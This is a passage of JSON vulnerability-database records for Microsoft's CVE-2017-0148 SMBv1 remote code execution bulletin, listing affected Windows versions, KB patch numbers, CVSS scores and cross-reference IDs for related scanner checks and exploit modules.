(Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": 
""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", 
"kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-06T10:43:29", "differentElements": ["msAffectedSoftware"], "edition": 15}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", 
"title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-06T12:49:42", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": 
"symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-27752"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM", "700099.PRM"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-06T12:49:42", "rev": 2}, "score": {"value": 7.3, 
"vector": "NONE", "modified": "2021-09-06T12:49:42", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3212646", "KB4012217", "KB3177186", "KB3205409", "KB3210720", "KB4012213", "KB3210721", "KB3205401", "KB4012212", "KB3213986", "KB4012214", "KB4012598", "KB4012216", "KB4013198", "KB4013429", "KB4012215", "KB4012606", "KBMS16-110, 3187754"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for 
x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems 
Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-06T12:49:42", "differentElements": ["msAffectedSoftware"], "edition": 16}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-06T16:54:11", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": 
["RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM", "700099.PRM"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-06T16:54:11", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-06T16:54:11", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012215", "KB4013429", "KB4012213", "KB4012217", "KB4012216", "KB4012214", "KB3210721", "KB3213986", 
"KBMS16-110, 3187754", "KB3177186", "KB4013198", "KB4012606", "KB3210720", "KB4012212", "KB3212646", "KB3205401", "KB4012598", "KB3205409"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 
(Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": 
""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", 
"kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": 